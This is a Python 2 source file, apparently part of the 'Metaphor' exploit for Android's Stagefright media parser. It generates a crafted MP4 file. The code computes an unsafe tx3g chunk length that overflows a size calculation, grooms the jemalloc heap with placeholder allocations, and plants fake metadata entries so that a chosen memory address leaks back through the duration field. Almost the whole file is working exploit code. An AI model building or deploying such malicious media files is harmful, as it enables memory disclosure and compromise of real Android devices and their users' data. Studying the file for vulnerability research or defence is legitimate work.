#!/usr/bin/python2
# -*- coding: utf-8 -*-

from metaphor_tools import *
from metaphor_base import *

class MetaphorLeak(MetaphorBase):
    # fill_size must be the upper limit for jemalloc's run's region size

    DEFAULT_CONFIG = \
    {
        # Heap shaping configuration
        'fill_size': 0x50,
        'groom_count': 0x10
    }
    
    def __init__(self, config):
        self.config = config

    def tx3g_data(self):
        overflow_data = ''

        # Vector header:
        overflow_data += alloc_metadata_header(self.config['fill_size'] - 0x10)
        # Vector data:
        # Key + Type + Size + Data[*]
        # Data is a pointer if size is larger than 4, otherwise Data is the value
        overflow_data += alloc_metadata('dura', 'in64', 8, self.config['leak_address']) # kKeyDuration
        overflow_data += alloc_metadata('lang', 'cstr', 4, 0x00000000) # kKeyMediaLanguage
        overflow_data += alloc_metadata('mime', 'cstr', 4, 0x00000000) # kKeyMIMEType
        overflow_data += alloc_metadata('text', p32(0), 4, 0x00000000) # kKeyTextFormatData

        pad_data = 'x' * ((self.config['fill_size'] * 2) - 8 - len(overflow_data))
        tx3g_data = pad_data + overflow_data

        tx3g_legit = chunk('tx3g', tx3g_data)

        return tx3g_legit
        
    def tx3g_trigger(self):
        old_size = self.config['fill_size'] * 2

        # size = 0xa0 = 0x50 tx3g buffer + 0x50 MetaData buffer
        # (size + chunk_size) = 0xa0 + unsafe_length) = 0x50
        # unsafe_length = 0x50 - 0xa0 = 0xffffffffffffffb0
        unsafe_length = (self.config['fill_size'] - old_size) % (2 ** 64)
        tx3g_overflow = chunk('tx3g', '', length = unsafe_length)
        print 'unsafe length: %016x + size: 0x%x = array_size: 0x%x' % (unsafe_length, old_size, self.config['fill_size'])

        return tx3g_overflow

    def evil_trak(self):
        trak_data = ''
        
        # trak:
        #   mdhd -> sets duration
        #   tx3g -> prepares overflow
        #   titl -> frees heap placeholder
        #   tx3g -> causes overflow

        # Prepare metadata
        # Insert kKeyDuration, kKeyMaxInputSize and kKeyMediaLanguage keys
        mdhd = valid_mdhd(314, 1)
        trak_data += mdhd
        
        # Insert kKeyTextFormatData key with specialized size
        tx3g_legit = self.tx3g_data()
        trak_data += tx3g_legit

        # Free placeholder allocated outside of track
        trak_data += alloc_placeholder(self.config['fill_size'] * 4)

        # Trigger overflow
        tx3g_overflow = self.tx3g_trigger()
        trak_data += tx3g_overflow

        trak = chunk('trak', trak_data)
        return trak
        
    def exploit_mp4(self):
        # File type header
        ftyp = valid_ftyp()
        
        # Start of a valid MP4
        moov = valid_moov()

        # Shape heap by filling holes
        shape = self.heap_shape()
        
        # Heap placeholder
        placeholder = alloc_placeholder(self.config['fill_size'])

        # Evil track that exploits the tx3g vulnerability
        trak = self.evil_trak()

        data = ''
        data += ftyp
        data += moov
        data += shape
        data += placeholder
        data += trak

        return data
